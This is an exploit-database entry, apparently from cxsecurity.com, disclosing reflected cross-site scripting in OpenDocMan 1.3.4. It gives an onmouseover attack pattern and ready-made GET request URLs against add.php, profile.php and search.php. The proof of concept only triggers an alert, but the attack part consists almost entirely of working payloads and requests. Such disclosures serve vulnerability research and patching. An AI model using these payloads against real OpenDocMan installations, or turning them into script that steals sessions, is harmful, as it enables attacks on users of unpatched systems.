OpenDocMan 1.3.4 - Multiple XSS Injection

2019.04.15
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

=========================================================================================== # Exploit Title: OpenDocMan 1.3.4 - Multiple XSS Injection # CVE: N/A # Date: 05/03/2019 # Exploit Author: Mehmet EMIROGLU # Vendor Homepage: https://sourceforge.net/projects/opendocman/files/ # Software Link: https://sourceforge.net/projects/opendocman/files/ # Version: v1.3.4 # Category: Webapps # Tested on: Wamp64, @Win # Software description: OpenDocMan is a web based document management system (DMS) written in PHP designed to comply with ISO 17025 and OIE standard for document management. It features fine grained control of access to files, and automated install and upgrades. =========================================================================================== # POC - XSS # Parameters : add.php,profile.php,search.php # Attack Pattern : /"onmouseover="alert(0x00136A) # GET Request : http://localhost/opendocman/add.php/"onmouseover="alert(0x00136A) # GET Request : http://localhost/opendocman/profile.php/"onmouseover="alert(0x00136A) # GET Request : http://localhost/opendocman/search.php/"onmouseover="alert(0x00136A) ===========================================================================================


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top